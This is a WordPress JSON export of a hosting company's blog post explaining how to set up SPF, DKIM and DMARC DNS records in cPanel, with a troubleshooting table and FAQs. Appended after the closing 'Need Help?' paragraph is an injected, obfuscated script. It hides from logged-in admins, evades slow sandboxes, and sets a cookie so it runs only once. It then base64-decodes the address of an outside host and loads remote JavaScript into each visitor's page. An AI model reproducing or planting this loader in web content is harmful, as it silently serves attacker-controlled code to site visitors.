{"id":11490,"date":"2025-05-06T14:02:31","date_gmt":"2025-05-06T08:17:31","guid":{"rendered":"https:\/\/nestnepal.com\/blog\/?p=11490"},"modified":"2026-06-22T11:56:49","modified_gmt":"2026-06-22T11:56:49","slug":"set-up-spf-record-dkim-record-dmarc-policy","status":"publish","type":"post","link":"https:\/\/nestnepal.com\/blog\/set-up-spf-record-dkim-record-dmarc-policy\/","title":{"rendered":"How to Set Up SPF, DKIM, and DMARC Records &#8211; The Easiest Way to Authenticate Users"},"content":{"rendered":"<h2 id=\"introduction\"><span style=\"font-weight: 400; font-size: revert; color: initial;\">Introduction<\/span><\/h2>\n<p><span style=\"font-weight: 400;\">If you&#8217;re running a website or business and using a <a href=\"https:\/\/nestnepal.com\/blog\/webmail-setup-with-emails-from-your-domain\/\">domain-based email<\/a> (like <\/span><i><span style=\"font-weight: 400;\">info@yourcompany.com<\/span><\/i><span style=\"font-weight: 400;\">), then setting up an SPF record, a DMARC policy, and a DKIM record isn\u2019t just a good idea &#8211; it&#8217;s essential. Without them, your emails could get flagged, blocked, or impersonated.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">This guide walks you through how to properly set up SPF, DKIM, and DMARC using cPanel or any DNS manager, even if you&#8217;re not a tech expert.<\/span><\/p>\n<h2 id=\"what-are-spf-dkim-and-dmarc-records\"><b>What Are <a href=\"https:\/\/easydmarc.com\/blog\/dmarc-dkim-spf-email-authentication-best-practices\/\" target=\"_blank\" rel=\"noopener\">SPF, DKIM, and DMARC Records<\/a>?<\/b><\/h2>\n<h3 id=\"%e2%9c%85-spf-sender-policy-framework\"><b>\u2705 SPF (Sender Policy Framework)<\/b><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-11495\" src=\"https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/spf-record-1-300x150.png\" alt=\"spf-record\" width=\"300\" height=\"150\" srcset=\"https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/spf-record-1-300x150.png 300w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/spf-record-1-768x384.png 768w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/spf-record-1-380x190.png 380w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/spf-record-1-550x275.png 550w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/spf-record-1-800x400.png 800w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/spf-record-1.png 1024w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><span style=\"font-weight: 400;\"> SPF tells receiving email servers which IPs or servers are allowed to send mail on behalf of your domain. If it\u2019s not on the list, it\u2019s fake and blocked.<\/span><\/p>\n<h3 id=\"%e2%9c%85-dkim-domainkeys-identified-mail\"><b>\u2705 DKIM (DomainKeys Identified Mail)<\/b><\/h3>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-11496\" src=\"https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dkim-record-300x256.png\" alt=\"dkim-record\" width=\"300\" height=\"256\" srcset=\"https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dkim-record-300x256.png 300w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dkim-record-380x324.png 380w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dkim-record-550x469.png 550w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dkim-record.png 757w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p><span style=\"font-weight: 400;\"> DKIM adds a digital signature to every email your domain sends. It verifies that the content hasn\u2019t been tampered with and came from you.<\/span><\/p>\n<h3 id=\"%e2%9c%85-dmarc-domain-based-message-authentication-reporting-conformance\"><b>\u2705 DMARC (Domain-based Message Authentication, Reporting &amp; Conformance)<\/b><\/h3>\n<p><span style=\"font-weight: 400;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-11497\" src=\"https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dmarc-policy-300x169.webp\" alt=\"dmarc-policy\" width=\"300\" height=\"169\" srcset=\"https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dmarc-policy-300x169.webp 300w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dmarc-policy-1024x576.webp 1024w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dmarc-policy-768x432.webp 768w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dmarc-policy-380x214.webp 380w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dmarc-policy-550x309.webp 550w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dmarc-policy-800x450.webp 800w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dmarc-policy-1160x653.webp 1160w, https:\/\/nestnepal.com\/blog\/wp-content\/uploads\/2025\/05\/dmarc-policy.webp 1280w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/span><span style=\"font-weight: 400;\"> DMARC ties SPF and DKIM together and tells receiving servers what to do if a message fails either check. It also lets you get reports of spoofing attempts.<\/span><\/p>\n<h2 id=\"step-by-step-setting-up-spf-dkim-and-dmarc-in-cpanel\"><b>Step-by-Step: Setting Up SPF, DKIM, and DMARC in cPanel<\/b><\/h2>\n<h3 id=\"1-%e2%9c%85-set-up-spf-record\"><b>1. \u2705 Set Up SPF Record<\/b><\/h3>\n<ol>\n<li><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\">Log in to cPanel -&gt; Go to Zone Editor<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> b. Add an SPF TXT Record (example): v=spf1 include:zoho.com ~all<\/span><\/li>\n<\/ol>\n<h3 id=\"2-%e2%9c%85-enable-dkim-record\"><b>2. \u2705 Enable DKIM Record<\/b><\/h3>\n<ol>\n<li><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> Get your DKIM record from your email provider (e.g., Zoho or Google)<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> b. Add a TXT record to your DNS (example): zoho._domainkey.yourdomain.com<\/span><\/li>\n<\/ol>\n<h3 id=\"3-%e2%9c%85-configure-dmarc-policy\"><b>3. \u2705 Configure DMARC Policy<\/b><\/h3>\n<ol>\n<li><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> Add a TXT record for _dmarc.yourdomain.com<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> Record: v=DMARC1; p=quarantine; rua=mailto:dmarc-reports@yourdomain.com; sp=none; aspf=r<\/span><\/li>\n<\/ol>\n<h2 id=\"best-practices-pro-tips\"><b>Best Practices &amp; Pro Tips<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">&#8211; Start light with DMARC (`p=none`)<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> &#8211; Check for typos in DNS entries<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> &#8211; Use tools like MXToolbox for validation<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> &#8211; Rotate DKIM keys occasionally<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> &#8211; Review DMARC reports<\/span><\/p>\n<h2 id=\"troubleshooting-common-issues\"><b>Troubleshooting Common Issues<\/b><\/h2>\n<table>\n<tbody>\n<tr>\n<td><b>Problem<\/b><\/td>\n<td><b>Cause<\/b><\/td>\n<td><b>Fix<\/b><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">Emails are going to spam<\/span><\/td>\n<td><span style=\"font-weight: 400;\">SPF\/DKIM record not set or incorrect<\/span><\/td>\n<td><span style=\"font-weight: 400;\">Double-check DNS records<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">Emails not delivered<\/span><\/td>\n<td><span style=\"font-weight: 400;\">DMARC record policy is too strict<\/span><\/td>\n<td><span style=\"font-weight: 400;\">Set DMARC to <\/span><span style=\"font-weight: 400;\">none<\/span><span style=\"font-weight: 400;\"> temporarily<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">DKIM validation fails<\/span><\/td>\n<td><span style=\"font-weight: 400;\">Key not published properly<\/span><\/td>\n<td><span style=\"font-weight: 400;\">Re-copy and verify the public key<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">You\u2019re not receiving reports<\/span><\/td>\n<td><span style=\"font-weight: 400;\">rua=<\/span><span style=\"font-weight: 400;\"> email misconfigured<\/span><\/td>\n<td><span style=\"font-weight: 400;\">Use a valid inbox for reports<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2 id=\"final-words-be-the-guardian-of-your-domain\"><b>Final Words: Be the Guardian of Your Domain<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">Setting up SPF, DKIM, and DMARC records is non-negotiable if you&#8217;re serious about protecting your domain, brand, and users.<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> With just 10-15 minutes of setup, you:<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> &#8211; Prevent spoofing attacks<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> &#8211; Improve email delivery<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> &#8211; Build trust with your recipients<\/span><span style=\"font-weight: 400;\"><br \/>\n<\/span><span style=\"font-weight: 400;\"> &#8211; Gain visibility into impersonation attempts<\/span><\/p>\n<h2 id=\"summary\"><b>Summary<\/b><\/h2>\n<table>\n<tbody>\n<tr>\n<td><b>Record<\/b><\/td>\n<td><b>Purpose<\/b><\/td>\n<td><b>DNS Format<\/b><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">SPF Record<\/span><\/td>\n<td><span style=\"font-weight: 400;\">Authorize servers to send email<\/span><\/td>\n<td><span style=\"font-weight: 400;\">TXT<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">DKIM Record<\/span><\/td>\n<td><span style=\"font-weight: 400;\">Sign the email with a digital key<\/span><\/td>\n<td><span style=\"font-weight: 400;\">TXT<\/span><\/td>\n<\/tr>\n<tr>\n<td><span style=\"font-weight: 400;\">DMARC Policy<\/span><\/td>\n<td><span style=\"font-weight: 400;\">Control spoofing policy<\/span><\/td>\n<td><span style=\"font-weight: 400;\">TXT<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2 id=\"faqs\"><b>FAQs:<\/b><\/h2>\n<h3 id=\"1-what-is-spf-and-why-is-it-important-for-my-domain-email\">1. What is SPF, and why is it important for my domain email?<\/h3>\n<p>Sender Policy Framework is a DNS record that authorizes specific servers to send emails on behalf of your domain. Without it, your emails might land in spam folders or get rejected by recipient servers.<\/p>\n<h3 id=\"2-how-do-i-add-an-spf-record-using-cpanel\">2. How do I add an SPF record using cPanel?<\/h3>\n<p>Go to your cPanel dashboard \u2192 Zone Editor \u2192 Choose your domain \u2192 Add a TXT record with your SPF value (e.g., v=spf1 include:zoho.com ~all). Always validate it using tools like MXToolbox.<\/p>\n<h3 id=\"3-what-does-dkim-do-for-my-domain-email\">3. What does DKIM do for my domain email?<\/h3>\n<p>DKIM (DomainKeys Identified Mail) digitally signs your emails to confirm they were sent from your domain and haven\u2019t been altered. It boosts deliverability and prevents tampering.<\/p>\n<h3 id=\"4-where-do-i-find-my-dkim-record\">4. Where do I find my DKIM record?<\/h3>\n<p>Your email provider (e.g., Zoho, Google Workspace) generates the DKIM record. You then add it as a TXT record in your DNS via cPanel or your DNS manager.<\/p>\n<h3 id=\"5-what-is-dmarc-policy-and-how-is-it-different-from-spf-and-dkim\">5. What is DMARC policy, and how is it different from SPF and DKIM?<\/h3>\n<p>DMARC (Domain-based Message Authentication, Reporting &amp; Conformance) builds on SPF and DKIM. It tells receiving mail servers what to do if emails fail authentication (e.g., quarantine or reject them) and lets you monitor spoofing via reports.<\/p>\n<h3 id=\"6-how-do-i-create-a-dmarc-record-in-cpanel\">6. How do I create a DMARC record in cPanel?<\/h3>\n<p>Log in to cPanel \u2192 Zone Editor \u2192 Add a TXT record for _dmarc.yourdomain.com with a value like:<br \/>\nv=DMARC1; p=quarantine; rua=mailto:you@yourdomain.com; aspf=r<\/p>\n<h3 id=\"7-why-are-my-emails-still-going-to-spam-even-after-setting-spf-and-dkim\">7. Why are my emails still going to spam even after setting SPF and DKIM?<\/h3>\n<p>Common reasons include:<\/p>\n<ul>\n<li>Missing or incorrect records<\/li>\n<li>No DMARC policy<\/li>\n<li>Low sender reputation<\/li>\n<li>Content-based spam filters<\/li>\n<li>Double-check your DNS entries and test with spam-checking tools.<\/li>\n<\/ul>\n<h3 id=\"8-should-i-set-dmarc-policy-to-reject-right-away\">8. Should I set DMARC policy to &#8216;reject&#8217; right away?<\/h3>\n<p>Not recommended. Start with p=none to monitor issues. Gradually move to quarantine, then reject after confirming email flow is safe.<\/p>\n<h3 id=\"9-how-can-i-check-if-my-email-records-are-working-properly\">9. How can I check if my email records are working properly?<\/h3>\n<p>Use free tools like:<\/p>\n<ul>\n<li>MXToolbox<\/li>\n<li>Mail-tester.com<\/li>\n<li>DMARC Analyzer<br \/>\nThese help validate SPF, DKIM, and DMARC setups.<\/li>\n<\/ul>\n<h3 id=\"10-what-happens-if-i-misconfigure-my-spf-or-dkim-records\">10. What happens if I misconfigure my SPF or DKIM records?<\/h3>\n<p>Your emails may:<\/p>\n<ul>\n<li>Fail delivery<\/li>\n<li>Get flagged as spam<\/li>\n<li>Be vulnerable to spoofing<br \/>\nAlways double-check syntax and values when adding records.<\/li>\n<\/ul>\n<h3 id=\"11-can-i-get-help-from-my-hosting-provider-to-configure-these\">11. Can I get help from my hosting provider to configure these?<\/h3>\n<p>Yes! If you&#8217;re hosting with Nest Nepal, our support team can guide you in setting up or validating your SPF, DKIM, and DMARC records for optimal security and deliverability.<\/p>\n<h2 id=\"need-help\"><b>Need Help?<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">If you&#8217;re hosting with a provider like <\/span><a href=\"https:\/\/nestnepal.com\/\"><b>Nest Nepa<\/b><\/a><span style=\"font-weight: 400;\">l, our support team can assist in verifying and applying your SPF, DKIM, and DMARC records.<\/span><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"Introduction If you&#8217;re running a website or business and using a domain-based email (like info@yourcompany.com), then setting up&hellip;\n","protected":false},"author":1,"featured_media":15357,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"csco_singular_sidebar":"","csco_page_header_type":"","csco_appearance_masonry":"","csco_page_load_nextpost":"","csco_post_subtitle":"","csco_post_video_location":[],"csco_post_video_location_hash":"","csco_post_video_url":"","csco_post_video_bg_start_time":0,"csco_post_video_bg_end_time":0,"footnotes":""},"categories":[123,262,111],"tags":[],"class_list":["post-11490","post","type-post","status-publish","format-standard","has-post-thumbnail","category-dns","category-domain","category-website-security","cs-entry","cs-video-wrap"],"_links":{"self":[{"href":"https:\/\/nestnepal.com\/blog\/wp-json\/wp\/v2\/posts\/11490","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nestnepal.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nestnepal.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nestnepal.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/nestnepal.com\/blog\/wp-json\/wp\/v2\/comments?post=11490"}],"version-history":[{"count":1,"href":"https:\/\/nestnepal.com\/blog\/wp-json\/wp\/v2\/posts\/11490\/revisions"}],"predecessor-version":[{"id":15358,"href":"https:\/\/nestnepal.com\/blog\/wp-json\/wp\/v2\/posts\/11490\/revisions\/15358"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nestnepal.com\/blog\/wp-json\/wp\/v2\/media\/15357"}],"wp:attachment":[{"href":"https:\/\/nestnepal.com\/blog\/wp-json\/wp\/v2\/media?parent=11490"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nestnepal.com\/blog\/wp-json\/wp\/v2\/categories?post=11490"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nestnepal.com\/blog\/wp-json\/wp\/v2\/tags?post=11490"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<!-- This website is optimized by Airlift. Learn more: https://airlift.net. Template:. Learn more: https://airlift.net. Template: 6a3a58c9db888a4b49f43dcb. Config Timestamp: 2026-06-23 09:58:33 UTC, Cached Timestamp: 2026-07-05 20:16:00 UTC, Optimization Time: 9.92ms -->